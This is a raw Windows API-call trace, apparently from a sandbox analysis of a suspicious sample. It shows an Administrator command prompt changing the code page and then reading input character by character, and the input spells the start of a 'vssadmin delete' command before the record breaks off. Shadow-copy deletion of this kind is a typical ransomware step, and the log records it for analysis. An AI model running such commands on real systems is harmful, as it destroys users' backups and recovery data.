[0186.451] GetConsoleTitleW (in: lpConsoleTitle=0x23aecff6f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0186.533] GetProcessHeap () returned 0x1ce53620000 [0186.533] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x21c) returned 0x1ce53639070 [0186.533] GetConsoleTitleW (in: lpConsoleTitle=0x1ce53639080, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0186.707] GetProcessHeap () returned 0x1ce53620000 [0186.707] RtlReAllocateHeap (Heap=0x1ce53620000, Flags=0x0, Ptr=0x1ce53639070, Size=0xaa) returned 0x1ce53639070 [0186.707] GetProcessHeap () returned 0x1ce53620000 [0186.707] RtlSizeHeap (HeapHandle=0x1ce53620000, Flags=0x0, MemoryPointer=0x1ce53639070) returned 0xaa [0186.707] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0186.794] GetProcessHeap () returned 0x1ce53620000 [0186.794] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53639070) returned 1 [0186.794] InitializeProcThreadAttributeList (in: lpAttributeList=0x23aecff610, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x23aecff500 | out: lpAttributeList=0x23aecff610, lpSize=0x23aecff500) returned 1 [0186.794] UpdateProcThreadAttribute (in: lpAttributeList=0x23aecff610, dwFlags=0x0, Attribute=0x60001, lpValue=0x23aecff4ec, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x23aecff610, lpPreviousValue=0x0) returned 1 [0186.794] GetStartupInfoW (in: lpStartupInfo=0x23aecff5a0 | out: lpStartupInfo=0x23aecff5a0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254)) [0186.794] GetProcessHeap () returned 0x1ce53620000 [0186.794] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x20) returned 0x1ce53639070 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0186.794] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0186.795] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0186.795] GetProcessHeap () returned 0x1ce53620000 [0186.795] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53639070) returned 1 [0186.795] GetProcessHeap () returned 0x1ce53620000 [0186.795] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x12) returned 0x1ce53639070 [0186.795] _get_osfhandle (_FileHandle=1) returned 0x254 [0186.795] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0186.795] _get_osfhandle (_FileHandle=0) returned 0x248 [0186.795] SetConsoleMode (hConsoleHandle=0x248, dwMode=0x0) returned 0 [0186.795] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x23aecff530*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x23aecff508 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x23aecff508*(hProcess=0x98, hThread=0x94, dwProcessId=0x500, dwThreadId=0x4a4)) returned 1 [0186.802] CloseHandle (hObject=0x94) returned 1 [0186.802] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.802] GetProcessHeap () returned 0x1ce53620000 [0186.802] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53625a10) returned 1 [0186.802] GetEnvironmentStringsW () returned 0x1ce53625a10* [0186.802] GetProcessHeap () returned 0x1ce53620000 [0186.802] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xac4) returned 0x1ce53639490 [0186.802] FreeEnvironmentStringsA (penv="=") returned 1 [0186.802] LoadLibraryExW (lpLibFileName="NTDLL.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff8c85b0000 [0186.803] GetProcAddress (hModule=0x7ff8c85b0000, lpProcName="NtQueryInformationProcess") returned 0x7ff8c86556b0 [0186.803] NtQueryInformationProcess (in: ProcessHandle=0x98, ProcessInformationClass=0x0, ProcessInformation=0x23aecfea08, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x23aecfea08, ReturnLength=0x0) returned 0x0 [0186.803] ReadProcessMemory (in: hProcess=0x98, lpBaseAddress=0x5337802000, lpBuffer=0x23aecfea40, nSize=0x7a0, lpNumberOfBytesRead=0x23aecfea00 | out: lpBuffer=0x23aecfea40*, lpNumberOfBytesRead=0x23aecfea00*=0x7a0) returned 1 [0186.803] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0187.378] GetExitCodeProcess (in: hProcess=0x98, lpExitCode=0x23aecff488 | out: lpExitCode=0x23aecff488*=0x0) returned 1 [0187.378] CloseHandle (hObject=0x98) returned 1 [0187.378] _vsnwprintf (in: _Buffer=0x23aecff658, _BufferCount=0x13, _Format="%08X", _ArgList=0x23aecff498 | out: _Buffer="00000000") returned 8 [0187.379] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.379] GetProcessHeap () returned 0x1ce53620000 [0187.379] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53639490) returned 1 [0187.379] GetEnvironmentStringsW () returned 0x1ce5363aa60* [0187.379] GetProcessHeap () returned 0x1ce53620000 [0187.379] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xaea) returned 0x1ce5363b560 [0187.379] FreeEnvironmentStringsA (penv="=") returned 1 [0187.379] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.379] GetProcessHeap () returned 0x1ce53620000 [0187.379] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce5363b560) returned 1 [0187.379] GetEnvironmentStringsW () returned 0x1ce5363aa60* [0187.380] GetProcessHeap () returned 0x1ce53620000 [0187.380] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xaea) returned 0x1ce5363b560 [0187.380] FreeEnvironmentStringsA (penv="=") returned 1 [0187.380] GetProcessHeap () returned 0x1ce53620000 [0187.380] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53639070) returned 1 [0187.380] DeleteProcThreadAttributeList (in: lpAttributeList=0x23aecff610 | out: lpAttributeList=0x23aecff610) [0187.380] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0187.383] ??_V@YAXPEAX@Z () returned 0x1 [0187.383] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.383] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0187.383] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.383] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff69534fc08 | out: lpMode=0x7ff69534fc08) returned 0 [0187.383] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.383] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff69534fc0c | out: lpMode=0x7ff69534fc0c) returned 0 [0187.383] GetConsoleOutputCP () returned 0x4e3 [0187.384] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0187.385] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.386] GetProcessHeap () returned 0x1ce53620000 [0187.386] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53638fe0) returned 1 [0187.386] GetProcessHeap () returned 0x1ce53620000 [0187.386] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53638e10) returned 1 [0187.386] GetProcessHeap () returned 0x1ce53620000 [0187.386] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53638c50) returned 1 [0187.386] GetProcessHeap () returned 0x1ce53620000 [0187.386] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53638bf0) returned 1 [0187.386] GetProcessHeap () returned 0x1ce53620000 [0187.386] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53638ba0) returned 1 [0187.386] GetProcessHeap () returned 0x1ce53620000 [0187.386] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53628bb0) returned 1 [0187.386] GetProcessHeap () returned 0x1ce53620000 [0187.386] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53626ef0) returned 1 [0187.386] GetProcessHeap () returned 0x1ce53620000 [0187.386] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53626c60) returned 1 [0187.386] GetProcessHeap () returned 0x1ce53620000 [0187.386] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53626e30) returned 1 [0187.387] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x23aecffa38 | out: _Buffer="\r\n") returned 2 [0187.387] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.387] GetFileType (hFile=0x254) returned 0x3 [0187.387] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.387] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0187.387] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23aecffa08, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffa08*=0x2, lpOverlapped=0x0) returned 1 [0187.387] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0187.387] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1ce537f0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0187.387] _vsnwprintf (in: _Buffer=0x1ce53800060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x23aecffa48 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0187.387] _vsnwprintf (in: _Buffer=0x1ce53800086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x23aecffa48 | out: _Buffer=">") returned 1 [0187.387] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.387] GetFileType (hFile=0x254) returned 0x3 [0187.387] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.387] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0187.387] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x23aecffa38, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffa38*=0x14, lpOverlapped=0x0) returned 1 [0187.387] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.387] GetFileType (hFile=0x248) returned 0x3 [0187.387] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.387] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.388] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.388] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c30, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0187.388] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.388] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.388] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.388] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c32, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0187.388] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.388] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.388] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.388] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c34, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0187.388] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.388] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.388] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.388] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c36, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0187.388] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.388] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.388] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.388] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c38, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0187.388] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.388] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.388] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.389] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0187.389] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.389] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.389] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.389] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0187.389] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.389] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.389] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.389] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0187.389] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.389] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.389] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.389] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c40, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0187.389] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.389] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.389] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.389] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c42, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0187.389] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.389] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.389] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.389] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c44, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0187.389] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.389] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.390] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.390] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c46, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0187.390] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.390] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.390] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.390] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c48, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0187.390] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.390] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.390] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.390] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0187.390] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.390] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.390] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.390] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0187.390] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.390] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.391] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.391] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0187.391] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.391] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.391] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.391] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, 